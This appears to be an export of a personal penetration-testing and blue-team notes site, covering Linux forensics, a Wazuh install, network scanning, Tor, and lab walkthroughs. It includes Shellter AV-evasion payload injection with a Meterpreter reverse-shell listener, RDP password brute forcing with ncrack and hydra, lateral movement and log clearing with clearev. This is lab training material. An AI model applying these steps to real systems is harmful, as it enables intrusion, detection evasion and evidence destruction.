logs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/fail.log\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/mail.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/mysql.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/daemon.log\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/debug\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ejournalctl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"history-and-hidden-file-information\"\u003ehistory and hidden file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003ehistory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003els -al \u003cspan class=\"c1\"\u003e# hidden files\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"suspicious-info\"\u003esuspicious info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo rkhunter --check --rwo\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo chkrootkit \u003cspan class=\"c1\"\u003e# rootkit checker\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"file-signature-analysis\"\u003efile signature analysis:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003exxd file_name \u003cspan class=\"p\"\u003e|\u003c/span\u003e head -n \u003cspan class=\"m\"\u003e10\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"basic-file-information\"\u003ebasic file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003efile file_name\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003estrings -t -d file_name \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# finding writable files inside /var/log directory :\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003efind / -writeable -type f 2\u0026gt; /dev/null \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep \u003cspan class=\"s2\"\u003e\u0026#34;/var/log\u0026#34;\u003c/span\u003e \n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"directory-permission-checking\"\u003eDirectory permission checking:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003els -ld Desktop\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"file-system-analysis-using-the-sleuth-kit\"\u003eFile system analysis using The Sleuth Kit:\u003c/h2\u003e\n\u003ch3 id=\"creating-an-file-system-image-using-dd\"\u003eCreating an file system image using dd:\u003c/h3\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition important\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zm0-384c13.3 0 24 10.7 24 24l0 112c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-112c0-13.3 10.7-24 24-24zM224 352a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eImportant\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eBefore that add a virtual hard disk of 1gb for testing purpose on your vm through vmware -\u0026gt; vm settings -\u0026gt; add -\u0026gt; hard disk -\u0026gt; SCSI -\u0026gt; Create new virtual disk -\u0026gt; 1 gb -\u0026gt; Done.\u003c/p\u003e","title":"Practical Demo: Linux Forensics"},{"content":" Installing wazuh in ubuntu 20.04 LTS step 1: curl -sO https://packages.wazuh.com/4.12/wazuh-install.sh \u0026amp;\u0026amp; sudo bash ./wazuh-install.sh -a This will take some time, and it will install all wazuh services, at the end it will provide the username and password of the wazuh server as well as in which port it is running. ![[Pasted image 20250725160156.png]] Then you need to disable auto update wazuh using this command -\u0026gt; sed -i \u0026#34;s/^deb /#deb /\u0026#34; /etc/apt/sources.list.d/wazuh.list apt update Note You can find the passwords for all the Wazuh indexer and Wazuh API users in the wazuh-passwords.txt file inside wazuh-install-files.tar. To print them run the following command -\u0026gt;\nsudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt Now i will set up the wazuh agent inside a windows machine . First install the wazuh GUI inside your windows machine using this doc page source -\u0026gt; wazuh-agent Then use this command inside the command prompt of the windows machine cd Downloads wazuh-agent-4.12.0-1.msi /q WAZUH_MANAGER=\u0026#34;wazuh_manager_IP\u0026#34; For powershell -\u0026gt; .\\wazuh-agent-4.12.0-1.msi /q WAZUH_MANAGER=\u0026#34;wazuh_manager_ip\u0026#34; Or you can directly double click on the installer file and provide the wazuh manager IP address -\u0026gt; click on manage -\u0026gt; start Onto the ubuntu machine wazuh manager refresh the page and you should see your agent running -\u0026gt; ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/02-wazuh/00-introduction-+-installation/","summary":"\u003cp\u003e\u003cimg alt=\"WAZUH_INTRO_1\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_1.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_2\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_2.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_3\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_3.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_4\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_4.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_5\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_5.png\"\u003e\u003c/p\u003e\n\u003ch1 id=\"installing-wazuh-in-ubuntu-2004-lts\"\u003eInstalling wazuh in ubuntu 20.04 LTS\u003c/h1\u003e\n\u003col\u003e\n\u003cli\u003estep 1:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -sO https://packages.wazuh.com/4.12/wazuh-install.sh \u003cspan class=\"o\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo bash ./wazuh-install.sh -a\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eThis will take some time, and it will install all wazuh services, at the end it will provide the username and password of the wazuh server as well as in which port it is running.\n![[Pasted image 20250725160156.png]]\u003c/li\u003e\n\u003cli\u003eThen you need to disable auto update wazuh using this command -\u0026gt;\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esed -i \u003cspan class=\"s2\"\u003e\u0026#34;s/^deb /#deb /\u0026#34;\u003c/span\u003e /etc/apt/sources.list.d/wazuh.list\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eapt update\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eYou can find the passwords for all the Wazuh indexer and Wazuh API users in the \u003ccode\u003ewazuh-passwords.txt\u003c/code\u003e file inside \u003ccode\u003ewazuh-install-files.tar\u003c/code\u003e. To print them run the following command -\u0026gt;\u003c/p\u003e","title":"Practical Wazuh"},{"content":"During the reconnaissance phase, penetration testers will eventually need to directly engage the target by performing an active information gathering technique known as scanning. Scanning is a technique that\u0026rsquo;s used to discover live systems on a network, identify the open service ports on a system, and discover vulnerabilities on host machines and even their operating system architecture. The information that\u0026rsquo;s gathered from scanning helps the penetration tester gain a clearer view of their targets compared to passive information gathering. When we perform this type of scans, chances are that we will get blocked most of the times because of the firewalls MAC address spoofing: When connecting to a wired or wireless network, your Network Interface Card (NIC) contains a burned-in address known as a Media Access Control (MAC) address, which is unique to each device. When your NIC sends traffic out on a network, your MAC address is also inserted within the frame header, and this information can be used to identify your machine on a network. As an aspiring penetration tester, you can change the MAC address on both your Ethernet and wireless network adapters by using a pre-installed tool known as MAC Changer. Changing your MAC address allows you to pretend to be a different device, such as a network device, a printer, or a vendor-specific device on the network. This technique can be used to protect the identity of your attacker machine while on an organization\u0026rsquo;s network, and it can also trick the network administrators into thinking your attacker machine is one of their existing end devices.\nIdentify your initial MAC address using the command ifconfig Note down your initial address We will take the interface eth0 down sudo ifconfig eth0 down Now we will use the tool macchanger to spoof our MAC address sudo macchanger -A eth0 sudo ifconfig eth0 up Notice the MAC address has been changed by using the command ifconfig\nLastly, to further verify the vendor of the spoofed MAC address, go to Mac-vendors and enter the MAC address\nDiscovering live systems on a network: Discovering live hosts on the network is an essential stage when performing a penetration test. Let\u0026rsquo;s imagine you\u0026rsquo;re an ethical hacker or a penetration tester; your target organization permits you to directly connect your attacker machine with Kali Linux on their network to perform security testing from their internal network. You\u0026rsquo;re eager to start discovering security vulnerabilities and hacking systems, but you\u0026rsquo;re not sure which systems are online, nor their host operating systems. GUIDELINES FOR PERFORMING LIVE SYSTEM SCANNING:\nEnsure you do not scan systems that you do not own or have been granted legal permission. Before all these stuffs we need to setup our target metasploitable 2 machine, we need to add it to the PENTEST-NET, it\u0026rsquo;s by-default is on NAT Note Most likely in your case you have already added metasploitable 2 either on vmnet2(which is 172.30.1.0/24) network or on NAT. If so then you don\u0026rsquo;t need to do these manual steps. I forgot to do so, that\u0026rsquo;s why i had to enable it manually. If you are having issues still then you can follow these steps or troubleshoot in your own way.\nTO DO THIS:\nOpen the VM first and login using msfadmin as username and password both. Then use the following commands: sudo nano /etc/network/interfaces We need to add another interface like eth2 , write the following into the config file: # The loopback network interface auto lo iface lo inet loopback # The primary network interface (DHCP) auto eth0 iface eth0 inet dhcp # The secondary interface for the lab (Static) auto eth2 iface eth2 inet static address 172.30.1.134 netmask 255.255.255.0 Save and Exit Nano: Press Ctrl+X, then Y, and Enter. Restart networking service: sudo /etc/init.d/networking restart use ip a Now we can start our task Next, let\u0026rsquo;s use Netdiscover to perform an active scan of the entire network: sudo netdiscover -r 172.30.1.0/24 Picked up metasploitable 2 What is netdiscover? Netdiscover is a scanning tool that uses Address Resolution Protocol (ARP) messages to identify live systems on a network. Using the –r syntax allows you to specify a range when scanning. Tip You can perform a passive scan of the network using the –p syntax, which allows Netdiscover to listen passively for any messages that can be exchanged between hosts on the network.\nNext, let\u0026rsquo;s use Network Mapper (Nmap) to scan the entire network while excluding our Kali Linux machine by using the following command: nmap -sn 172.30.1.0/24 --exclude 172.30.1.130 2. Using the –sn syntax ensures Nmap performs a ping sweep of the network. This means Nmap will send an Internet Control Message Protocol (ICMP) Echo Request message to all devices within the network range. Online devices will typically respond with an ICMP Echo Reply message. 3. Furthermore, using the --exclude command allows us to specify which IP addresses to exclude from scanning. This command is best used when you are restricted from scanning various IP addresses and subnetworks during a penetration test.\nusing sipcalc for live host discovery: Installation: sudo apt install -y sipcalc usage: sipcalc 172.30.1.0/24 ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/03-active-scanning-techniques/","summary":"\u003cp\u003eDuring the reconnaissance phase, penetration testers will eventually need to directly engage the target by performing an active information gathering technique known as scanning. Scanning is a technique that\u0026rsquo;s used to discover live systems on a network, identify the open service ports on a system, and discover vulnerabilities on host machines and even their operating system architecture. The information that\u0026rsquo;s gathered from scanning helps the penetration tester gain a clearer view of their targets compared to passive information gathering.\nWhen we perform this type of scans, chances are that we will get blocked most of the times because of the firewalls\n\u003cimg alt=\"as_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/03/as_1.png\"\u003e\u003c/p\u003e","title":"Active Scanning Techniques"},{"content":"THE ONION ROUTER: The Onion Router (TOR) is a service and special network that allows users to gain anonymity when browsing the internet and accessing the dark web. TOR functions a little like proxy chaining, but it\u0026rsquo;s a lot cooler and complex. It encrypts traffic between each TOR relay node and does a lot more to ensure that a source and a destination host never know each other\u0026rsquo;s identities. Install tor: sudo apt update \u0026amp;\u0026amp; sudo apt install tor Configuring the peoxychains4 config file: sudo vim /etc/proxychains4.conf come to the end where we edited the proxy servers and do this: ! Then save and exit using :wq Use these 2 commands to activate tor and check it\u0026rsquo;s status: ! check tor connection ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/03-tor/","summary":"\u003ch2 id=\"the-onion-router\"\u003eTHE ONION ROUTER:\u003c/h2\u003e\n\u003cp\u003eThe Onion Router (TOR) is a service and special network that allows users to gain anonymity when browsing the internet and accessing the dark web. TOR functions a little like proxy chaining, but it\u0026rsquo;s a lot cooler and complex. It encrypts traffic between each TOR relay node and does a lot more to ensure that a source and a destination host never know each other\u0026rsquo;s identities.\n\u003cimg alt=\"tor_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_1.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"install-tor\"\u003eInstall tor:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo apt update \u003cspan class=\"o\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt install tor\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col\u003e\n\u003cli\u003eConfiguring the \u003ccode\u003epeoxychains4\u003c/code\u003e config file:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo vim /etc/proxychains4.conf\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003ecome to the end where we edited the proxy servers and do this: !\u003cimg alt=\"tor_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eThen save and exit using \u003ccode\u003e:wq\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eUse these 2 commands to activate tor and check it\u0026rsquo;s status: !\u003cimg alt=\"tor_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003echeck tor connection\n\u003cimg alt=\"tor_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/03/tor_4.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e","title":"Anonymity with TOR"},{"content":"Shellter is an antimalware evasion tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. When the custom payload is executed on a targeted system, the trusted files are executed as if the application is benign, but the custom payload (shellcode) is executed in the background within the memory space.\nInstallation: sudo apt update sudo apt install shellter Configuration of shellter:\nconfigure the working environment for Shellter and install Wine32: sudo dpkg --add-architecture i386 sudo apt update sudo apt install wine32 List all the windows binaries in kali linux: ls -l /usr/share/windows-binaries/ Next, let’s use the following commands to copy the vncviewer.exe file to our current working directory, as it’s perceived as a harmless file: cp /usr/share/windows-binaries/vncviewer.exe /home/kali It would be great if you once restart the machine for the changes we made earlier. using shellter: Next, use the following commands to launch the Shellter application on Kali Linux: sudo shellter 2. Next, when the Shellter window appears, you will be provided with the option to use Shellter in automatic or manual mode – type A and hit Enter to apply automatic mode: Note In automatic mode, Shellter dynamically analyzes the Portable Executable (PE) file to identify a suitable injection point, whereas manual mode offers more control to the user.\nspecify the vncviewer.exe file within /home/kali/ directory Note To learn more about PE format, please visit https://learn.microsoft.com/en-us/windows/win32/debug/pe-format.\nShellter will determine where it can inject shellcode within the PE file. Once this process is completed, type Y and hit Enter to enable stealth mode, choose L for Listed payloads, then choose meterpreter_reverse_tcp by index 1 , then set LHOST, LPORT: After completion Click enter then: Upload the encoded vncviewer.exe to virustotal for analysis: Setting up a metapreter listener: kali@kali:~$ msfconsole msf6 \u0026gt; use exploit/multi/handler msf6 exploit(multi/handler) \u0026gt; set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \u0026gt; set LHOST 172.30.1.50 msf6 exploit(multi/handler) \u0026gt; set LPORT 5678 msf6 exploit(multi/handler) \u0026gt; set AutoRunScript post/windows/manage/ migrate msf6 exploit(multi/handler) \u0026gt; exploit COMMAND BREAKDOWN:\nThe windows/meterpreter/reverse_tcp payload ensures that, when a connection is detected, Metasploit will send this payload to the targeted system, which will execute within memory and create a reverse shell back to the Kali Linux machine. The LHOST and LPORT parameters are used to set the local IP address and listening port on Kali Linux. The AutoRunScript post/windows/manage/migrate command ensures that, once a connection has been established from the victim system to Kali Linux, Metasploit will automatically migrate the process on the targeted system to another process to reduce detection. The exploit command is used to execute a payload or exploit module within Metasploit. Delivery: Delivering the vncviewer.exe payload to our windows 10 enterprise machine THESPIDERMAN We will use python http module to do that, write the following command into the terminal: python3 -m http.server 8000 3. Open the target windows machine and head over to your Network IP, whichever Network you created, mine is on the 172.30.1.0/24 network. The Python3 web server will enable us to download files from the Kali Linux machine onto other systems within our lab environment 4. Download the file and execute it 5. We will get a reverse shell back to our listener: Important Not all Windows-based executables will work with Shellter. When working with Shellter, it is important to ensure the PE file that is encoded with shellcode from Shellter executes long enough on the targeted system for the staged payload to be delivered from Kali Linux to the target. Keep in mind that executables that are heavily protected or use non-standard PE structures might pose challenges.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/03-creating-custom-payloads-with-shelter/","summary":"\u003cp\u003e\u003ccode\u003eShellter\u003c/code\u003e is an \u003ccode\u003eantimalware evasion\u003c/code\u003e tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. When the custom payload is executed on a targeted system, the trusted files are executed as if the application is benign, but the custom payload (shellcode) is executed in the background within the memory space.\u003c/p\u003e","title":"Creating Custom Payloads With Shelter"},{"content":" First we will enable it into our EXTERNAL-RED domain controller aka windows server 2019. Fire up the VM and open server manager : Refresh the page it should show enabled Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network. Let\u0026rsquo;s start exploiting: Open kali Let\u0026rsquo;s do a formal check if the target is visible on the network or not: nmap -sn 192.168.83.0/24 --exclude 192.168.83.128 3. Identifying if RDP is running on the target 192.168.83.140\nnmap -p 3389 192.168.83.140 Port 3389 is default port for RDP service in windows. 4. Next, use Ncrack to perform an online password-based attack on the RDP service on the targeted system with the intention of identifying valid user credentials for accessing the service on the target:\nncrack -v -T 3 -u sysadmin -P /home/kali/win_2k19_passes.txt rdp://192.168.83.140 # for accessing Domain level accounts ncrack -v -T 3 -u .\\\\sysadmin -P /home/kali/win_2k19_passes.txt rdp://192.168.83.140 # for acccessing Local accounts Results prove that simply just enabling the RDP service isn\u0026rsquo;t going to work, because of NLA(Network Level Authentication) inside the modern windows servers. When you try to connect, the server first demands that you prove who you are before it even loads the login screen. This uses an advanced authentication protocol (CredSSP) that most brute-force tools, including the standard RDP module in Hydra, cannot speak. The connection fails before a password can even be attempted 5. We will temporarily disable NLA then retry.\nDisabling NLA: On your Windows Server, open the \u0026ldquo;Run\u0026rdquo; dialog (Windows Key + R). Type sysdm.cpl and press Enter. Go to the Remote tab. Uncheck the box that says \u0026quot;Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)\u0026quot;. Click OK or Apply. Using hydra hydra -l .\\\\sysadmin -P /home/kali/win_2k19_passes.txt 192.168.83.140 rdp -V -f -t 4 # for accessing Local accounts hydra -l sysadmin -P /home/kali/win_2k19_passes.txt 192.168.83.140 rdp -V -f -t 4 # for accessing Domain level accounts like administrator of DC None of the tools worked in my scenario, and this may happen in real world also. One of the reasons that i can think of is that the users are not local admins that\u0026rsquo;s why RDP is blocking us from getting an access. Let me show you through the rdesktop command.\nTrying rdesktop: rdesktop -u \u0026#39;.\\sysadmin\u0026#39; -p \u0026#39;Password123\u0026#39; 192.168.83.140 Let\u0026rsquo;s add sysadmin into Remote desktop users group. Open your windows server and follow the command into your cmd and run your command prompt as admin : net localgroup \u0026#34;Remote Desktop Users\u0026#34; \u0026#34;UserName\u0026#34; /add For domain users use this command:\nnet localgroup \u0026#34;Remote Desktop Users\u0026#34; \u0026#34;DomainName\\UserName\u0026#34; /add Powershell commands:\n# for local users Add-LocalGroupMember -Group \u0026#34;Remote Desktop Users\u0026#34; -Member \u0026#34;UserName\u0026#34; # for domain users Add-LocalGroupMember -Group \u0026#34;Remote Desktop Users\u0026#34; -Member \u0026#34;DomainName\\UserName\u0026#34; If still having problem, make sure you have added the group here: TO FIND THIS PATH: Press Windows Key + R, type gpedit.msc, and press Enter. In the left pane, navigate to this exact path:Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment In the right pane, find and double-click the policy named \u0026quot;Allow log on through Remote Desktop Services\u0026quot;. If remote desktop users is not in the list, click Add users or group type Remote Desktop Users -\u0026gt; check names -\u0026gt; apply ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/03-exploiting-rdp/","summary":"\u003col\u003e\n\u003cli\u003eFirst we will enable it into our EXTERNAL-RED domain controller aka windows server 2019.\u003c/li\u003e\n\u003cli\u003eFire up the VM and open \u003ccode\u003eserver manager\u003c/code\u003e :\n\u003cimg alt=\"rdp_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/03/rdp_1.png\"\u003e\nRefresh the page it should show \u003ccode\u003eenabled\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eImagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"lets-start-exploiting\"\u003eLet\u0026rsquo;s start exploiting:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOpen kali\u003c/li\u003e\n\u003cli\u003eLet\u0026rsquo;s do a formal check if the target is visible on the network or not:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sn 192.168.83.0/24 --exclude 192.168.83.128\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"rdp_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/03/rdp_2.png\"\u003e\n3. Identifying if \u003ccode\u003eRDP\u003c/code\u003e is running on the target \u003ccode\u003e192.168.83.140\u003c/code\u003e\u003c/p\u003e","title":"Exploiting RDP"},{"content":"Lateral Movement and Pivoting: Lateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding a foothold. Within many organizations, their network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through their organization. However, there are various host devices that are configured with a dual-homed network connection that simply allows the host to be connected to two different IP networks at the same time. Our target will be Blue vm first. Fire up the Blue vm and kali machine Exploit it and get a shell using ms17-010 exploit. On the Meterpreter session, use the arp command to view the entries within the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache contains a list of IP-to-MAC address bindings of all the host devices that recently transmitted a message between themselves and the compromised host: meterpreter\u0026gt; arp We can see that the target machine is on two networks one is NAT aka PENTEST-NET(192.168.83.0/24) and another is 172.30.1.0/24(PIVOT-NET) 6. Next, use the ipconfig command within Meterpreter to view a list of network adapters and their IP addresses In the screenshot we can see that interface 17 is connected with a different subnet. Additionally, you can use the route command to check if the compromised system has a network route that is otherwise unreachable from your attacker machine (Kali Linux). The host has a network route to 172.30.1.0/24 Adding route from our kali to 172.30.1.0/24 subnet. To do that we will use a metasplit module named post/multi/manage/autoroute Background the session , we will try to run a portscan through metasploit itself to determine we can access the target network now. Clearing tracks: Every action that occurs on a host is recorded in the form of a log message used to keep track of events for accountability. This means if a penetration tester performs any action on a compromised host, logs are also generated indicating the actions performed. Such logs are useful to the cybersecurity analyst and incident responders who gather evidence from a compromised system to determine what happened during a cyber-attack. For instance, cybersecurity analysts and incident responders not only gather evidence from logs but also analyze them to identify patterns of malicious activity, indicators of compromise (IoCs), and potential vulnerabilities.\nFor this we will use a builtin command inside metasploit clearev Data encoding and exfiltration: Encoding using exe2hex: We will encode the previous vncviewer.exe payload we have inserted using msfvenom , this time we will use the SPIDERMAN machine for getting a shell back. COMMAND: /usr/bin/exe2hex -x vncviewer.exe 2. Setup the multi handler in metasploit. Make sure you are entering the same port you have used during the insertion of malicious payload inside vncviwere.exe 3. Transfer the payload to 